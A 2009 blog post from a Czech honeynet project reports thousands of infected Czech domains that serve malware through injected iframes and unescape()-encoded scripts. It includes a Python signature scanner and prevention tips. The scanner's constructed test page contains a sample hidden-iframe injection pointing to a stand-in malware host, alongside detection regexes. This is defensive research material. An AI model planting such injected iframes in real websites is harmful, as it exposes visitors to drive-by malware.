
Thousands of Czech domains distributing malware.

2009-06-15 15:31:36

Our database currently holds just over 4,300 infected Czech domains which currently (+/- 14 days) distribute malware. The pages contain malicious code in an iframe, a script, or a combination of the two using JS functions such as document.write and unescape. The interpreted code is often another script, or follow-up scripts that call an external URL. Tests were conducted on sites stored in our database using defined signatures. Infected sites are also visited by our native sensors in a virtual environment.
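An added example, not the honeynet.cz scanner itself: a small signature check in Python that flags the injection patterns described above, decoding the unescape() payload of a document.write call to expose the iframe it builds. The sample page and the malware.example URLs are constructed for the demonstration.

```python
import re
from urllib.parse import unquote

# Signatures for the injection styles seen on the infected pages: an injected
# (often hidden) iframe, or a script that rebuilds one via document.write(unescape(...)).
IFRAME_RE = re.compile(r'<iframe\b[^>]*>', re.I)
SRC_RE = re.compile(r'src\s*=\s*["\']?([^"\'\s>]+)', re.I)
HIDDEN_RE = re.compile(
    r'(width|height)\s*=\s*["\']?0\b|display\s*:\s*none|visibility\s*:\s*hidden', re.I)
WRITE_UNESCAPE_RE = re.compile(
    r'document\.write\s*\(\s*unescape\s*\(\s*["\']([^"\']+)["\']', re.I)


def js_unescape(s):
    """Decode the JavaScript unescape() encoding: %XX and %uXXXX sequences."""
    s = re.sub(r'%u([0-9a-fA-F]{4})', lambda m: chr(int(m.group(1), 16)), s)
    return unquote(s)


def iframes(fragment, label):
    """Return (signature, src) pairs for every iframe in an HTML fragment."""
    out = []
    for tag in IFRAME_RE.findall(fragment):
        src = SRC_RE.search(tag)
        if src is None:
            continue
        kind = label + (' (hidden)' if HIDDEN_RE.search(tag) else '')
        out.append((kind, src.group(1)))
    return out


def scan_html(html):
    """Scan one page body; findings list the signature hit and the embedded URL."""
    findings = []
    for m in WRITE_UNESCAPE_RE.finditer(html):
        # Decode the payload first, then apply the iframe signature to the result.
        findings += iframes(js_unescape(m.group(1)), 'document.write(unescape) iframe')
    findings += iframes(html, 'iframe')
    return findings


# Constructed sample page: an unescape()-wrapped iframe plus a plain hidden one.
SAMPLE_PAGE = (
    "<html><body><h1>Ke stazeni</h1>"
    "<script>document.write(unescape('%3Ciframe%20src%3D%22http%3A%2F%2Fmalware.example"
    "%2Fin.php%22%20width%3D0%20height%3D0%3E%3C%2Fiframe%3E'))</script>"
    '<iframe src="http://malware.example/x.html" style="display:none"></iframe>'
    "</body></html>"
)

if __name__ == '__main__':
    for sig, url in scan_html(SAMPLE_PAGE):
        print(f'{sig}: {url}')
```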


The infection itself:

In my opinion, a substantial part of the sites were infected via stolen passwords, but it is not excluded that some sites were affected directly through a weakness in the server or a running application. E.g. on www.mp3kestazenizdarma.cz (also www.mp3-free-stazeni.cz) all domains of the third and higher level are infected.

Warning: opening the following links is completely safe, but viewing the embedded URLs can be dangerous!

List of Czech domains:

http://www.honeynet.cz/domains/cz.txt

List of harmful URLs:

http://www.honeynet.cz/domains/malicious.txt

As for what they will be used for: the list includes a variety of web sites with a wide scope, and from a global perspective it is an ideal sample. Imagine what access various attacker groups currently have. How it can be used, you can leave to your imagination.


How can you prevent infection of your website or compromise of your password? We try to describe a few hints which can minimise intrusion into your server or desktop.

For users:

  1. Keep your operating system, applications and antivirus up to date (without antivirus, it's not a good idea to even start your PC). Update your updates ;]
  2. Don't visit unknown or dodgy web pages. If it's necessary, use a Firefox extension such as NoScript or a tool such as Sandboxie.
  3. Don't install every application you get from a friend or from some dodgy website. For such situations you can use virtualization software like VirtualBox or VMware. Common user practice is to click every 'install/yes' button.
  4. Don't use FTP servers. If you have no choice, don't save passwords in your FTP client if you don't know whether, or how strongly, the password is encrypted. You can use a keychain such as KeePass, but be careful and learn how your keychain works.
  5. It's a good idea to use encrypted protocols like SSH, HTTPS, SFTP, FTP-SSL or VPN; then there is no way to listen to the password with sniffers.

For ISP:

  1. Offer a file transfer method other than FTP.
  2. Better checking of uploaded files, such as the file type or the content of the files.
  3. Better customer education.


©2005-2010  Creative Commons Attribution-Noncommercial-No Derivative Works 3.0 Czech Republic License. info_at_honeynet_dot_cz, irc.honeynet.cz #honeynet.cz